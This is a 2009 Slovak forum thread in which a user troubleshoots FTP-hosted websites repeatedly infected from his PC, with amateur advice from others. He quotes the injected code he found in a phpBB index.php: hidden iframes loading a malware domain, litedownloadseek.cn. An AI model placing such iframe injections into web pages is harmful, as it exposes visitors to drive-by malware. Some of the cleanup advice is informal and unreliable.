| | |
| Stránka: 1 z 1
| [ Príspevkov: 20 ] | |
Autor | Správa |
---|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal dulius: 14.01.2009 19:35 | |
|
mam ESET, ziadne chyby nevypisuje, ale posledny tyzden su vsetko moje konta nakazene, takze evidentne ide virus z mojho PC cez ftp
pisal som o priklade aj tu: http://www.pcforum.sk/phpbb-forum-zeby- ... 56576.html
co s tym????
pomoze reinstall notebooku? nahram novy system, ale co dalej? zalohoval som si data, ale ten virus moze byt v tych zalohach ...
dakujem za kazdu radu ...
|
|
Registrovaný: 12.01.09 Prihlásený: 07.12.09 Príspevky: 28 Témy: 3 Bydlisko: Michalovce | Napísal To0X: 14.01.2009 19:51 | |
|
reinstall alebo obnovenie systemu.
_________________ PC-1:|Asus P5QL-E|Intel C2D 7400@2,8GHz|ATI Radeon HD4850 512MB GDDR3|Seagate 500GB|LC Power Green 550W|2x2GB DDR2 Corsair|Scythe Ninja 2
PC-2:|VIA KT600|AMD Athlon XP 2500@1,8GHz|ATI RADEON 9600XT|RAM:2GB|OS:Windows Vista Bussines |
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 19:55 | |
|
tomas3 píše: reinstall alebo obnovenie systemu.
ale ved som o tom pisal .. a co mi to pomoze? ked virus moze byt hocikde, v tych suboroch, co mam zalohu z webu veci
|
|
Registrovaný: 08.09.08 Prihlásený: 20.10.09 Príspevky: 17 Témy: 2 |
skús si prezrieť obsahy priečinkov RECYCLER na všetkych svojich diskoch. Je to skrytý systémový priečinok. Možno sa ti podari tam nájsť nejaký vírus.
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 19:59 | |
|
Skorpikon píše: skús si prezrieť obsahy priečinkov RECYCLER na všetkych svojich diskoch. Je to skrytý systémový priečinok. Možno sa ti podari tam nájsť nejaký vírus.
ako pozriet? nejakym programom, ci rucne? ako to myslis?
|
|
Registrovaný: 08.09.08 Prihlásený: 20.10.09 Príspevky: 17 Témy: 2 | |
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 20:00 | |
|
Skorpikon píše: nie len ručne.
neviem teraz vobec, ako sa hlada rucne virus ...
|
|
Registrovaný: 08.09.08 Prihlásený: 20.10.09 Príspevky: 17 Témy: 2 |
skrátka, si cez total comander, alebo cez tento počítač otvor priečinok RECYCLER. Tam budeš mať X ďalších priečinkov s ikonou ako má kôš. Každý jeden otvor. V každom by mali byť len dva súbory. A to INFO 2 a desktop.ini
Všetko ine môžeš vymazať.
Ak maš nejakeho trojana, tak môže byť práve v týchto priečinkoch.
Ak je to nejaky lepší trojan tak sa nebude dať z toho priečinku odstrániť obyčajným delete. Potom ti može pomocť jeden dobry soft a to UNLOCKER
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 20:09 | |
|
|
|
Registrovaný: 08.09.08 Prihlásený: 20.10.09 Príspevky: 17 Témy: 2 |
Ano. Ono zvykne, pri mazani suboru vyhodiť niečo take že nemáš právo vykonať takúto operáciu. A cez ten unlocker to vieš odblokovať a následne odstrániť.
Po prečistení tých RECYCLER priečinkov ešte pre istotu nezabudni vysipať kôš.
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 20:17 | |
|
vsetko ako si pisal som vymazal, v tom recycler ... mal som tam 3 priecinky a vsetko vymazat slo v pohode ...
|
|
Registrovaný: 08.09.08 Prihlásený: 20.10.09 Príspevky: 17 Témy: 2 |
a ešte máš ten problém s vírom???
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 20:22 | |
|
no to neviem ...
teraz sa radsej na ziadne ftp nenapajam, aby som nenarobil este viac skody ako osohu, chapes ...
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 20:27 | |
|
teraz som rucne odstranil cez webFTP ten kod, ktory robi sarapatu ... na webe spojmesaprehokej.sk to bolo ...
hodilo to na phpbb forum, do index.php suboru, uplne nakoniec, nasiel so tam toto: Kód: ?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola17" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola15" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
|
|
Registrovaný: 08.09.08 Prihlásený: 20.10.09 Príspevky: 17 Témy: 2 |
chapem ale keď antivirak nehádzal žiadne hlášky pred tým tak ti ich nebude hádzať ani teraz. Čiže nezistíš či sa problém vyriešil, alebo ešte naďalej pretrváva. Keby si sa pripojil na server kde máš tú stranku čo si opisoval v inom príspevku a zmazal by si to čo ti tam pribudlo. Ak to robí nejaký stroj, tak sa to tam opäť dopíše. A zrejme sa po pripojení na server vírus zasa skopíruje do tvojho compu. A potom možeš prezrieť zasa tie RECYCLER a zistiš na čom si. Či je to vírus, alebo ťa niekto hackol.
To je len taký nápad.
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 20:32 | |
|
Skorpikon píše: chapem ale keď antivirak nehádzal žiadne hlášky pred tým tak ti ich nebude hádzať ani teraz. Čiže nezistíš či sa problém vyriešil, alebo ešte naďalej pretrváva. Keby si sa pripojil na server kde máš tú stranku čo si opisoval v inom príspevku a zmazal by si to čo ti tam pribudlo. Ak to robí nejaký stroj, tak sa to tam opäť dopíše. A zrejme sa po pripojení na server vírus zasa skopíruje do tvojho compu. A potom možeš prezrieť zasa tie RECYCLER a zistiš na čom si. Či je to vírus, alebo ťa niekto hackol. To je len taký nápad.
urcite ma niekto nehakol, toto by bol extrem ... mozno kebyze na jednom webe, to by bolo oki, ale je to na viacerych ftp, kde mam rozne konta a podobne .. bude to virus ... niektore stranky mi uz google zablokoval, no riesim to ... zatial sa na tie ftp nebudem pripajat cez total comander, len cez web ftp, to by malo byt bezpecne ... podla mna v tom recycler nic nenajdem ...
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 14.01.2009 20:58 | |
|
pridavam zaujimavy poznatok: spustil som Ad Aware 2008 a pocitac sa mi restartoval ... po restarte som to zopakoval a zase ... no daco nebude s kostolnym poriadkom ... ten virus asi nechce aby ho ad aware nasiel
|
|
Registrovaný: 08.09.08 Prihlásený: 20.10.09 Príspevky: 17 Témy: 2 | |
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 15.01.2009 7:58 | |
|
Skorpikon píše: skús si hodiť do google tu dinu adresu co ti pridava do kodu. Najdeš nejake fora kde sa to trochu rozobera. Možno ti niečo z toho pomože. odporučam si prezrtieť hlavne http://asert.arbornetworks.com/2009/01/ ... loitation/
na tej adrese presne o tom pisu ...
Kód: Comment Post by: Bachi — January 7th, 2009 @ 8:33 am EST Reply
We’ve experienced a lot of these attacks recently (most of them this morning). Via hacked ftp accounts all index.* files of at least 12 domains were infected with:
right after the tag.
Kód: Comment Post by: Bachi — January 7th, 2009 @ 8:35 am EST Reply
{iframe src=”http://litedownloadseek.cn/in.cgi?cocacola3″ width=1 height=1 style=”visibility: hidden”} {/iframe} (replaced >< with }{)
no ale nevidim tam riesenie ...
|
|
Registrovaný: 20.01.07 Prihlásený: 12.02.24 Príspevky: 401 Témy: 87 | Napísal autor témy dulius: 15.01.2009 19:12 | |
|
moznosa nieco pohlo ... dnes som spustil PC, windows mi tam instaloval nejake aktualizacie a ked som restartoval, nabehlo toto:
|
|
| Stránka: 1 z 1
| [ Príspevkov: 20 ] | |
| Nemôžete zakladať nové témy v tomto fóre Nemôžete odpovedať na témy v tomto fóre Nemôžete upravovať svoje príspevky v tomto fóre Nemôžete mazať svoje príspevky v tomto fóre
|
|